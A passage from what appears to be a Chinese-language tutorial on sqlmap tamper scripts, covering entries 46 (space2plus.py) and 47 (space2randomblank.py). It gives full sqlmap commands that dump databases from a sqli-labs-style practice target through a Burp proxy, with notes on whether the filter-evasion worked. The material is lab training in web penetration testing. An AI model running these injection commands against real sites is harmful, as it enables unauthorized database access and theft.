46. space2plus.py脚本
通过使用"+"来替换空格 适用于所有数据库
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2plus.py" --proxy="http://127.0.0.1:8080" -batch
没有注入成功,我们看看burp抓包情况
确认效果是没问题的,使用+衔接
==================================================================================================================================================
47. space2randomblank.py脚本
使用类似%09,%0A,%0C,%0D随机字符串替换payload中的空格
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2randomblank.py" --proxy="http://127.0.0.1:8080" -batch
确认是可以成功注入,那么我们看看burp的抓包情况
确实添加了%0A %0C等随机字符串进行注入
迷茫的人生,需要不断努力,才能看清远方模糊的志向!
